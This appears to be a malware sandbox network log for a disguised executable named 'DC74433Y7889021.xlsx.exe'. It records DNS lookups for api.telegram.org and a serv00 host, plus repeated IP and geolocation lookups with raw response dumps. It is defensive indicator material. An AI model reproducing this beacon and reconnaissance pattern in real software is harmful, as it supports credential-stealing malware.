Jul 17, 2024 14:17:13.934848070 CEST | 1.1.1.1 | 192.168.2.4 | 0x68e4 | No error (0) | api.telegram.org | - | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Jul 17, 2024 14:17:20.437954903 CEST | 1.1.1.1 | 192.168.2.4 | 0xfbbf | No error (0) | s4.serv00.com | - | 213.189.52.181 | A (IP address) | IN (0x0001) | false
• reallyfreegeoip.org
• api.telegram.org
• checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 193.122.130.0 | 80 | 2992 | C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe

Timestamp | Bytes transferred | Direction | Data
Jul 17, 2024 14:17:01.821135998 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jul 17, 2024 14:17:03.038635015 CEST | 320 | IN | HTTP/1.1 200 OK
Date: Wed, 17 Jul 2024 12:17:02 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 859d0079b539d979bbb6b1ed03dd61bb
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Jul 17, 2024 14:17:03.044138908 CEST | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jul 17, 2024 14:17:03.339458942 CEST | 320 | IN | HTTP/1.1 200 OK
Date: Wed, 17 Jul 2024 12:17:03 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 023c3762e62060880535a033191115e4
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Jul 17, 2024 14:17:04.600856066 CEST | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jul 17, 2024 14:17:04.984718084 CEST | 320 | IN | HTTP/1.1 200 OK
Date: Wed, 17 Jul 2024 12:17:04 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 4a6ca620c556c209768e5f56c502ea50
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49736 | 193.122.130.0 | 80 | 2992 | C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe

Timestamp | Bytes transferred | Direction | Data
Jul 17, 2024 14:17:05.627724886 CEST | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jul 17, 2024 14:17:06.091027021 CEST | 320 | IN | HTTP/1.1 200 OK
Date: Wed, 17 Jul 2024 12:17:06 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 7380af36d66da57f2ece11d913cf5afd
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49738 | 193.122.130.0 | 80 | 2992 | C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe

Timestamp | Bytes transferred | Direction | Data
Jul 17, 2024 14:17:06.720724106 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jul 17, 2024 14:17:07.212661028 CEST | 320 | IN | HTTP/1.1 200 OK
Date: Wed, 17 Jul 2024 12:17:07 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 493baadcba1ce1a917153014390ab0fc
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID: 3 | Source IP: 192.168.2.4 | Source Port: 49741 | Destination IP: 193.122.130.0 | Destination Port: 80 | PID: 2992 | Process: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe
Timestamp: Jul 17, 2024 14:17:07.824177980 CEST | Bytes transferred: 151 | Direction: OUT | Data:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Timestamp: Jul 17, 2024 14:17:08.317326069 CEST | Bytes transferred: 320 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Wed, 17 Jul 2024 12:17:08 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 4b22cebb0db6e7f9f67692854adb3510
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID: 4 | Source IP: 192.168.2.4 | Source Port: 49744 | Destination IP: 193.122.130.0 | Destination Port: 80 | PID: 2992 | Process: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe
Timestamp: Jul 17, 2024 14:17:08.932322979 CEST | Bytes transferred: 151 | Direction: OUT | Data:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Timestamp: Jul 17, 2024 14:17:09.408221960 CEST | Bytes transferred: 320 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Wed, 17 Jul 2024 12:17:09 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: ef4d2cc99a3cbf4f6221ac34457d36e6
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID: 5 | Source IP: 192.168.2.4 | Source Port: 49746 | Destination IP: 193.122.130.0 | Destination Port: 80 | PID: 2992 | Process: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe
Timestamp: Jul 17, 2024 14:17:10.284399033 CEST | Bytes transferred: 151 | Direction: OUT | Data:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Timestamp: Jul 17, 2024 14:17:10.763042927 CEST | Bytes transferred: 320 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Wed, 17 Jul 2024 12:17:10 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 95548904407e37f7c29d31a32535c21d
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID: 6 | Source IP: 192.168.2.4 | Source Port: 49748 | Destination IP: 193.122.130.0 | Destination Port: 80 | PID: 2992 | Process: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe
Timestamp: Jul 17, 2024 14:17:11.379313946 CEST | Bytes transferred: 151 | Direction: OUT | Data:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Timestamp: Jul 17, 2024 14:17:11.837635994 CEST | Bytes transferred: 320 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Wed, 17 Jul 2024 12:17:11 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: c1196921ce695464f4b273507b999a27
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID: 7 | Source IP: 192.168.2.4 | Source Port: 49750 | Destination IP: 193.122.130.0 | Destination Port: 80 | PID: 2992 | Process: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe
Timestamp: Jul 17, 2024 14:17:12.463634014 CEST | Bytes transferred: 151 | Direction: OUT | Data:
GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Timestamp: Jul 17, 2024 14:17:13.264460087 CEST | Bytes transferred: 320 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Wed, 17 Jul 2024 12:17:12 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: ee7c406d4f87f249208bda1a83247a26
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Timestamp: Jul 17, 2024 14:17:13.265459061 CEST | Bytes transferred: 320 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Wed, 17 Jul 2024 12:17:12 GMT
Content-Type: text/html
Content-Length: 103
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: ee7c406d4f87f249208bda1a83247a26
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID: 0 | Source IP: 192.168.2.4 | Source Port: 49733 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 2992 | Process: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe
Timestamp: 2024-07-17 12:17:04 UTC | Bytes transferred: 84 | Direction: OUT | Data:
GET /xml/8.46.123.33 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
Timestamp: 2024-07-17 12:17:04 UTC | Bytes transferred: 712 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Wed, 17 Jul 2024 12:17:04 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 52982
Last-Modified: Tue, 16 Jul 2024 21:34:02 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i9O2dQ0WgQWrFFRNWC0RLjLdKHCBUNLIzoGt1dzRfs3qz5yHh7PDNEh%2BlY%2B1eTg1Wx%2FuEv47HfxY7USVxu9KU%2F3SsHah6l9TbuJ4IHfKLPL%2FyUbGe1PKTQdeh3eGFyuhH%2BPFZbcL"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8a4a2ab27bb272b7-EWR
alt-svc: h3=":443"; ma=86400
Timestamp: 2024-07-17 12:17:04 UTC | Bytes transferred: 340 | Direction: IN | Data:
Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
Timestamp: 2024-07-17 12:17:04 UTC | Bytes transferred: 5 | Direction: IN | Data:
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 1 | Source IP: 192.168.2.4 | Source Port: 49735 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 2992 | Process: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe
Timestamp: 2024-07-17 12:17:05 UTC | Bytes transferred: 60 | Direction: OUT | Data:
GET /xml/8.46.123.33 HTTP/1.1
Host: reallyfreegeoip.org
Timestamp: 2024-07-17 12:17:05 UTC | Bytes transferred: 714 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Wed, 17 Jul 2024 12:17:05 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 52983
Last-Modified: Tue, 16 Jul 2024 21:34:02 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U1dXsn%2BhRgSCLkABqd0%2BItwDfWLK2AIcHMibO1vfJKi9j5pBXp65lnbQ9%2Bql%2FLGuXKEJ6wEfxnnr0X8UyxvYJExNB%2FrgAVw%2Bd1QE7W%2FWnXQY8BBsfouIhOMntqUjg12ARhrIUzpu"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8a4a2ab9bc0e8cc0-EWR
alt-svc: h3=":443"; ma=86400
Timestamp: 2024-07-17 12:17:05 UTC | Bytes transferred: 340 | Direction: IN | Data:
Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
Timestamp: 2024-07-17 12:17:05 UTC | Bytes transferred: 5 | Direction: IN | Data:
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 2 | Source IP: 192.168.2.4 | Source Port: 49737 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 2992 | Process: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe
Timestamp: 2024-07-17 12:17:06 UTC | Bytes transferred: 84 | Direction: OUT | Data:
GET /xml/8.46.123.33 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
Timestamp: 2024-07-17 12:17:06 UTC | Bytes transferred: 710 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Wed, 17 Jul 2024 12:17:06 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 52984
Last-Modified: Tue, 16 Jul 2024 21:34:02 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i%2FZUCcGNYvTp3SZPzRjTIjK2DH0KP2EJUA%2FTdlr9eWqI2sx4h9T4DdLW%2BoWxGkmu1TsXqHe6Gf6pSER7xF1RrEhlF9orBt2MU687%2Fy8J0L4SgkFAwT2CwaX6zbiKgJU%2BvNvHGQHW"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8a4a2ac08d09440c-EWR
alt-svc: h3=":443"; ma=86400
Timestamp: 2024-07-17 12:17:06 UTC | Bytes transferred: 340 | Direction: IN | Data:
Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
Timestamp: 2024-07-17 12:17:06 UTC | Bytes transferred: 5 | Direction: IN | Data:
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 3 | Source IP: 192.168.2.4 | Source Port: 49739 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 2992 | Process: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe
Timestamp: 2024-07-17 12:17:07 UTC | Bytes transferred: 84 | Direction: OUT | Data:
GET /xml/8.46.123.33 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
Timestamp: 2024-07-17 12:17:07 UTC | Bytes transferred: 704 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Wed, 17 Jul 2024 12:17:07 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 52985
Last-Modified: Tue, 16 Jul 2024 21:34:02 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2lAyArFnGK%2FcfzCTMp0nThylq5Et4h7ySSnmB8AEVBEUbyPfTL9OmJldvxru1fZ7uI97yhIn9LWB7J1ZZCxBxsy0T4rj02p1%2B6aboaeyQ2WJooptxskqOsc5puDOVfhJ1HoaUFmp"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8a4a2ac77a91c466-EWR
alt-svc: h3=":443"; ma=86400
Timestamp: 2024-07-17 12:17:07 UTC | Bytes transferred: 340 | Direction: IN | Data:
Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
Timestamp: 2024-07-17 12:17:07 UTC | Bytes transferred: 5 | Direction: IN | Data:
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 4 | Source IP: 192.168.2.4 | Source Port: 49742 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 2992 | Process: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe
Timestamp: 2024-07-17 12:17:08 UTC | Bytes transferred: 60 | Direction: OUT | Data:
GET /xml/8.46.123.33 HTTP/1.1
Host: reallyfreegeoip.org
Timestamp: 2024-07-17 12:17:08 UTC | Bytes transferred: 712 | Direction: IN | Data:
HTTP/1.1 200 OK
Date: Wed, 17 Jul 2024 12:17:08 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 52986
Last-Modified: Tue, 16 Jul 2024 21:34:02 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2rnX%2F3ZIMtZVtvHk0m%2BXv%2FxprHsQEaxqqvzBv8vCvBcQYQv2VNPjXC7IVIMWfe%2Bds3cjVw%2B9eaWRGeV4IDNVRevTLaPVfwjg9F7Y%2F3KajRk8tCXPTlROXltHHQ3s7ceVwaqNsI2E"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8a4a2ace4ba1c42a-EWR
alt-svc: h3=":443"; ma=86400
Timestamp: 2024-07-17 12:17:08 UTC | Bytes transferred: 340 | Direction: IN | Data:
